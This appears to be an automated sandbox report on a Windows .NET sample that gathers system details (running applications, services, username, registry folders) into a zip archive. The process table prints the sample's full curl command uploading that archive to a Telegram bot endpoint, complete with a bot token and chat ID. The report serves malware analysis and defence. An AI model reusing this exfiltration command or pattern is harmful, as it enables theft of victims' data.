Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
n0PDCyrFnf.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\n0PDCyrFnf.exe.log
|
CSV text
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5f5ahar5.bbo.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bocl3hz4.ptz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkueo54n.2mf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uowp1cpy.icm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vlddpbgj.o5m.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmwcsfiw.qjm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\database.zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\database\DLLs_in_memory.txt
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\database\registry_folders.txt
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\database\running-applications.txt
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\database\running-services.txt
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\database\username.txt
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\n0PDCyrFnf.exe
|
"C:\Users\user\Desktop\n0PDCyrFnf.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wbem\WMIC.exe
|
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_VideoController get VideoModeDescription /format:csv
|
||
|
C:\Windows\System32\curl.exe
|
"C:\Windows\system32\curl.exe" -X POST -H "content-type: multipart/form-data" -F document=@C:\Users\user\AppData\Local\Temp\database.zip
-F chat_id=-1002165480850 https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument_
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessageP
|
unknown
|
||
|
https://api.telegram.org
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://api.telegram.org/bot
|
unknown
|
||
|
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentX
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://api.telegram.org/bot$token/sendDocument
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentC:
|
unknown
|
||
|
http://www.t.com/pkiops/cersoft%20Time-Stam
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessage
|
149.154.167.220
|
||
|
https://api.telegram.org/bot7516945260:AAHF6P58
|
unknown
|
||
|
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument8
|
unknown
|
||
|
https://api.telegram.org/bot$token/sendMessage
|
unknown
|
||
|
http://go.microsoftLanguagePackManagement.psd1
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument-
|
unknown
|
||
|
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument
|
149.154.167.220
|
||
|
http://go.microsoftL
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://crl.v
|
unknown
|
||
|
https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentapi.telegram.
|
unknown
|
There are 20 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
api.telegram.org
|
149.154.167.220
|
|
|
|
171.39.242.20.in-addr.arpa
|
unknown
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\n0PDCyrFnf_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\n0PDCyrFnf_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\n0PDCyrFnf_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\n0PDCyrFnf_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\n0PDCyrFnf_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\n0PDCyrFnf_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\n0PDCyrFnf_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\n0PDCyrFnf_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\n0PDCyrFnf_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\n0PDCyrFnf_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\n0PDCyrFnf_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\n0PDCyrFnf_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\n0PDCyrFnf_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\n0PDCyrFnf_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
882000
|
unkown
|
page readonly
|
|
|
|
1CC6B8C6000
|
heap
|
page read and write
|
||
|
2BC7A8E8000
|
heap
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
3D2E000
|
stack
|
page read and write
|
||
|
2BC7A90A000
|
heap
|
page read and write
|
||
|
1CC6B8A8000
|
heap
|
page read and write
|
||
|
7FFD9BDA8000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BC7A700000
|
heap
|
page read and write
|
||
|
565C000
|
trusted library allocation
|
page read and write
|
||
|
3656000
|
heap
|
page read and write
|
||
|
200B5000
|
heap
|
page read and write
|
||
|
7FFD9BD70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCFF000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A738000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BF8A000
|
trusted library allocation
|
page read and write
|
||
|
226A0000
|
heap
|
page read and write
|
||
|
7FFD9BE04000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A8E0000
|
heap
|
page read and write
|
||
|
2BC7A734000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
3D31000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A8D7000
|
heap
|
page read and write
|
||
|
11B6000
|
heap
|
page read and write
|
||
|
1DDE9000
|
stack
|
page read and write
|
||
|
2BC7A8FF000
|
heap
|
page read and write
|
||
|
11BC000
|
heap
|
page read and write
|
||
|
2BC7A8F8000
|
heap
|
page read and write
|
||
|
EFD4F08000
|
stack
|
page read and write
|
||
|
2BC7A713000
|
heap
|
page read and write
|
||
|
7FFD9B77E000
|
trusted library allocation
|
page read and write
|
||
|
22743000
|
heap
|
page read and write
|
||
|
7FFD9BFD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BDCD000
|
trusted library allocation
|
page read and write
|
||
|
13D99000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9C013000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A718000
|
heap
|
page read and write
|
||
|
20E6D000
|
stack
|
page read and write
|
||
|
891000
|
unkown
|
page readonly
|
||
|
41D8000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BF96000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA87000
|
trusted library allocation
|
page read and write
|
||
|
20107000
|
heap
|
page read and write
|
||
|
1D0EF000
|
stack
|
page read and write
|
||
|
7FFD9B7D2000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B907000
|
heap
|
page read and write
|
||
|
1CC6B8BE000
|
heap
|
page read and write
|
||
|
2BC7A755000
|
heap
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BD28000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B8B2000
|
heap
|
page read and write
|
||
|
494D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BF05000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
41CE000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B8C6000
|
heap
|
page read and write
|
||
|
7FFD9C030000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BDD7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B820000
|
remote allocation
|
page read and write
|
||
|
7FFD9B730000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BFE5000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
226BC000
|
heap
|
page read and write
|
||
|
7FFD9BCAA000
|
trusted library allocation
|
page read and write
|
||
|
13D5E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
38FE000
|
stack
|
page read and write
|
||
|
7FFD9BE50000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A8DE000
|
heap
|
page read and write
|
||
|
1F37D000
|
stack
|
page read and write
|
||
|
2BC7A8FB000
|
heap
|
page read and write
|
||
|
1CC6B820000
|
remote allocation
|
page read and write
|
||
|
11EF000
|
heap
|
page read and write
|
||
|
7FFD9BDFC000
|
trusted library allocation
|
page read and write
|
||
|
2271C000
|
heap
|
page read and write
|
||
|
639FFF000
|
stack
|
page read and write
|
||
|
7FFD9BD30000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A8E0000
|
heap
|
page read and write
|
||
|
1FFA0000
|
heap
|
page read and write
|
||
|
2BC7A8FB000
|
heap
|
page read and write
|
||
|
1CC6B921000
|
heap
|
page read and write
|
||
|
7FFD9B646000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B76E000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A8F8000
|
heap
|
page read and write
|
||
|
4CBC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5BB000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D9EE000
|
stack
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BE43000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BD18000
|
trusted library allocation
|
page read and write
|
||
|
EFD53FF000
|
stack
|
page read and write
|
||
|
2BC7A9D5000
|
heap
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B8F7000
|
heap
|
page read and write
|
||
|
9B5000
|
heap
|
page read and write
|
||
|
7FFD9C060000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BD78000
|
trusted library allocation
|
page read and write
|
||
|
1F778000
|
stack
|
page read and write
|
||
|
7FFD9C080000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BE07000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A757000
|
heap
|
page read and write
|
||
|
7FFD9BCBA000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCD4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCAF000
|
trusted library allocation
|
page read and write
|
||
|
1FFB7000
|
heap
|
page read and write
|
||
|
2BC7A8E4000
|
heap
|
page read and write
|
||
|
1CC6B820000
|
remote allocation
|
page read and write
|
||
|
2BC7AE45000
|
heap
|
page read and write
|
||
|
2BC7AE47000
|
heap
|
page read and write
|
||
|
EFD527E000
|
stack
|
page read and write
|
||
|
2BC7A707000
|
heap
|
page read and write
|
||
|
2BC7AE42000
|
heap
|
page read and write
|
||
|
1CC6B8BF000
|
heap
|
page read and write
|
||
|
2BC7A755000
|
heap
|
page read and write
|
||
|
1FF8E000
|
heap
|
page read and write
|
||
|
7FFD9C050000
|
trusted library allocation
|
page read and write
|
||
|
1EAE000
|
stack
|
page read and write
|
||
|
7FFD9BDA0000
|
trusted library allocation
|
page read and write
|
||
|
4CC3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B740000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BDE2000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A8EB000
|
heap
|
page read and write
|
||
|
7FFD9BD93000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C4A9000
|
stack
|
page read and write
|
||
|
2008A000
|
heap
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B590000
|
trusted library allocation
|
page read and write
|
||
|
9F0000
|
heap
|
page read and write
|
||
|
7FFD9BD40000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A90A000
|
heap
|
page read and write
|
||
|
7FFD9BF2C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A8DC000
|
heap
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
1E1EF000
|
stack
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A660000
|
heap
|
page read and write
|
||
|
37B0000
|
heap
|
page read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
41E5000
|
trusted library allocation
|
page read and write
|
||
|
639EFC000
|
stack
|
page read and write
|
||
|
1C7F0000
|
heap
|
page read and write
|
||
|
13D41000
|
trusted library allocation
|
page read and write
|
||
|
226B8000
|
heap
|
page read and write
|
||
|
2269D000
|
stack
|
page read and write
|
||
|
1219000
|
heap
|
page read and write
|
||
|
7FFD9B5B4000
|
trusted library allocation
|
page read and write
|
||
|
11B0000
|
heap
|
page read and write
|
||
|
2005E000
|
heap
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A90A000
|
heap
|
page read and write
|
||
|
7FFD9BE60000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A8FB000
|
heap
|
page read and write
|
||
|
7FF483250000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BDC7000
|
trusted library allocation
|
page read and write
|
||
|
129B000
|
heap
|
page read and write
|
||
|
2BC7AE4A000
|
heap
|
page read and write
|
||
|
2BC7A748000
|
heap
|
page read and write
|
||
|
7FFD9B5A3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7AC000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B8B6000
|
heap
|
page read and write
|
||
|
7FFD9B640000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BDDB000
|
trusted library allocation
|
page read and write
|
||
|
11F1000
|
heap
|
page read and write
|
||
|
7FFD9BEF4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B676000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BC7A8F8000
|
heap
|
page read and write
|
||
|
7FFD9BDC9000
|
trusted library allocation
|
page read and write
|
||
|
5662000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B955000
|
trusted library allocation
|
page read and write
|
||
|
3D93000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A900000
|
heap
|
page read and write
|
||
|
2BC7A8E4000
|
heap
|
page read and write
|
||
|
20027000
|
heap
|
page read and write
|
||
|
7FFD9B750000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B7C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CC6B921000
|
heap
|
page read and write
|
||
|
7FFD9BF30000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B7D0000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B8E7000
|
heap
|
page read and write
|
||
|
7FFD9BFA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B8BD000
|
heap
|
page read and write
|
||
|
3840000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BF08000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A8DD000
|
heap
|
page read and write
|
||
|
2BC7AE43000
|
heap
|
page read and write
|
||
|
7FFD9C0A0000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B907000
|
heap
|
page read and write
|
||
|
7FFD9C00C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BFC0000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B800000
|
heap
|
page read and write
|
||
|
1CC6B8C8000
|
heap
|
page read and write
|
||
|
2BC7A739000
|
heap
|
page read and write
|
||
|
4C26000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BE40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BD20000
|
trusted library allocation
|
page read and write
|
||
|
4CCF000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA8D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
1FF80000
|
heap
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
7FFD9BCB3000
|
trusted library allocation
|
page read and write
|
||
|
FE2000
|
stack
|
page read and write
|
||
|
2BC7A8E2000
|
heap
|
page read and write
|
||
|
2BC7A8EB000
|
heap
|
page read and write
|
||
|
226A2000
|
heap
|
page read and write
|
||
|
200B8000
|
heap
|
page read and write
|
||
|
1E62F000
|
stack
|
page read and write
|
||
|
1E5EB000
|
stack
|
page read and write
|
||
|
20A6D000
|
stack
|
page read and write
|
||
|
7FFD9B593000
|
trusted library allocation
|
page execute and read and write
|
||
|
950000
|
heap
|
page read and write
|
||
|
2BC7AE4A000
|
heap
|
page read and write
|
||
|
7FFD9B64C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B5EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
2BC7AE10000
|
heap
|
page read and write
|
||
|
7FFD9B594000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A6B0000
|
trusted library allocation
|
page read and write
|
||
|
20067000
|
heap
|
page read and write
|
||
|
7FFD9BD80000
|
trusted library allocation
|
page read and write
|
||
|
2229D000
|
stack
|
page read and write
|
||
|
4CBF000
|
trusted library allocation
|
page read and write
|
||
|
1FF78000
|
stack
|
page read and write
|
||
|
2BC7A75E000
|
heap
|
page read and write
|
||
|
7FFD9BF1F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BF58000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A9D0000
|
heap
|
page read and write
|
||
|
882000
|
unkown
|
page readonly
|
||
|
7FFD9B7F0000
|
trusted library allocation
|
page read and write
|
||
|
3DDE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
|
121B000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A8DF000
|
heap
|
page read and write
|
||
|
2BC7C730000
|
heap
|
page read and write
|
||
|
16AE000
|
stack
|
page read and write
|
||
|
2BC7AE40000
|
heap
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BE46000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B8B6000
|
heap
|
page read and write
|
||
|
7FFD9B59D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BC7A8DC000
|
heap
|
page read and write
|
||
|
7FFD9C090000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A6E0000
|
heap
|
page read and write
|
||
|
7FFD9C070000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A670000
|
heap
|
page read and write
|
||
|
13E07000
|
trusted library allocation
|
page read and write
|
||
|
2BC7AE4B000
|
heap
|
page read and write
|
||
|
7FFD9BD60000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A9DA000
|
heap
|
page read and write
|
||
|
3920000
|
heap
|
page execute and read and write
|
||
|
13D3F000
|
trusted library allocation
|
page read and write
|
||
|
3894000
|
heap
|
page execute and read and write
|
||
|
88D000
|
unkown
|
page readonly
|
||
|
7FFD9BCD8000
|
trusted library allocation
|
page read and write
|
||
|
4C12000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
2BC7AE4E000
|
heap
|
page read and write
|
||
|
4C81000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BDDE000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B8C6000
|
heap
|
page read and write
|
||
|
1D5EE000
|
stack
|
page read and write
|
||
|
20082000
|
heap
|
page read and write
|
||
|
2126B000
|
stack
|
page read and write
|
||
|
1CC6B8F8000
|
heap
|
page read and write
|
||
|
201FD000
|
stack
|
page read and write
|
||
|
1CC6BC60000
|
heap
|
page read and write
|
||
|
1CC6B8B3000
|
heap
|
page read and write
|
||
|
41D6000
|
trusted library allocation
|
page read and write
|
||
|
1FF8C000
|
heap
|
page read and write
|
||
|
2BC7A736000
|
heap
|
page read and write
|
||
|
2183F000
|
stack
|
page read and write
|
||
|
13D65000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BE00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B7E0000
|
heap
|
page read and write
|
||
|
13DC6000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A6B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CC6B8E3000
|
heap
|
page read and write
|
||
|
1226000
|
heap
|
page read and write
|
||
|
2015D000
|
heap
|
page read and write
|
||
|
7FFD9BD50000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B8A0000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BE31000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A718000
|
heap
|
page read and write
|
||
|
EFD52FF000
|
stack
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B77A000
|
trusted library allocation
|
page read and write
|
||
|
4C6A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BDC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BF5C000
|
trusted library allocation
|
page read and write
|
||
|
3890000
|
heap
|
page execute and read and write
|
||
|
7FFD9BEF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BDB1000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A8EB000
|
heap
|
page read and write
|
||
|
7FF483260000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BC7AE4A000
|
heap
|
page read and write
|
||
|
2BC7AE4E000
|
heap
|
page read and write
|
||
|
2BC7A8F9000
|
heap
|
page read and write
|
||
|
1FFB5000
|
heap
|
page read and write
|
||
|
4C3E000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B8E2000
|
heap
|
page read and write
|
||
|
2BC7A759000
|
heap
|
page read and write
|
||
|
2BC7A8EB000
|
heap
|
page read and write
|
||
|
7FFD9BCEB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCD1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
41E9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BDBB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BDA6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BD16000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A755000
|
heap
|
page read and write
|
||
|
7FFD9BDB6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCD6000
|
trusted library allocation
|
page read and write
|
||
|
2013C000
|
heap
|
page read and write
|
||
|
2BC7A761000
|
heap
|
page read and write
|
||
|
7FFD9BD10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA68000
|
trusted library allocation
|
page read and write
|
||
|
4C2A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCA5000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9C020000
|
trusted library allocation
|
page read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
2BC7A6B0000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A8F8000
|
heap
|
page read and write
|
||
|
EFD537E000
|
stack
|
page read and write
|
||
|
2BC7A710000
|
heap
|
page read and write
|
||
|
2BC7A755000
|
heap
|
page read and write
|
||
|
20118000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A755000
|
heap
|
page read and write
|
||
|
2BC7A690000
|
heap
|
page read and write
|
||
|
63A0FE000
|
stack
|
page read and write
|
||
|
2BC7A75F000
|
heap
|
page read and write
|
||
|
1CC6B8BD000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A8EB000
|
heap
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
10E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BDA4000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
4BC1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BD9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BDD2000
|
trusted library allocation
|
page read and write
|
||
|
1CCEF000
|
stack
|
page read and write
|
||
|
960000
|
heap
|
page read and write
|
||
|
1FFD7000
|
heap
|
page read and write
|
||
|
1BD60000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A747000
|
heap
|
page read and write
|
||
|
7FFD9C068000
|
trusted library allocation
|
page read and write
|
||
|
1100000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A8E4000
|
heap
|
page read and write
|
||
|
7FFD9BE68000
|
trusted library allocation
|
page read and write
|
||
|
13D31000
|
trusted library allocation
|
page read and write
|
||
|
11A0000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B921000
|
heap
